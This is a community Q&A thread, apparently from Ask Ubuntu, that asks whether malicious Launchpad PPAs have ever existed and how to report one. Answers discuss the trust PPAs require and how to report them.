Has there been any malicious PPA so far?
People often discourage users from using PPAs because the PPA may potentially contain libraries and packages which may break the system. I have been using PPAs since 2010, and never encountered a problem (of course, I check whether a PPA hosts any suspicious packages before adding it).
Usually developers make PPAs to help others install a software, not to break their systems. Also, the packages need to be digitally signed, and this way, the person who packaged something fishy can be traced back.
I am wondering whether "PPAs are harmful" is a common problem faced by many, or it is a popular belief which people spread (without much evidence).
I want to ask about some facts (so that the question does not become "opinion based").
- Has there been any malicious PPA so far? By malicious, I mean something which is intentionally packaged to create a dependency hell, or something that will mess up with the home or
/
directory with the postinstall script, or something that broke the installation.
(Since the question was closed due to being opinion based, I am looking for examples of such harmful PPAs, so that it can be answered with facts).
- Is there any way a user can report a potentially harmful PPA in Launchpad?
By PPA, I am referring to a PPA hosted in Launchpad, not any third party repository hosted in any website.
This is one of the main reasons Ubuntu is turning to snap based installations: a PPA has root access to our system so when it comes to PPAs trust is high. The only safe repositories are the official ones and their mirrors.
A PPA can include packages that replace existing packages. Not really an issue if you want the newest chromium to replace and old chromium. But it is when it replaces python, or ruby, or perl or a library like libc.
Has there been any malicious PPA so far in Launchpad?
No. There is a process to get a PPA accepted on Launchpad but on Launchpad the owner of the PPA is also public so probably not a good idea to try and slip a PPA with malicious code.
Mind that malware writes probably want to earn some easy cash and doing it through a PPA to target Linux users will require to create a new piece of software that is good enough to install. That takes weeks or even years to get done. Seems easier to target Windows users (easier to reach, and there are still many more of them).
Is there any way a user can report a potentially malicious PPA?
As with all things Launchpad related: you file a bug report against it.
If you find a malicious PPA, the preferred way to report it is via our support tracker.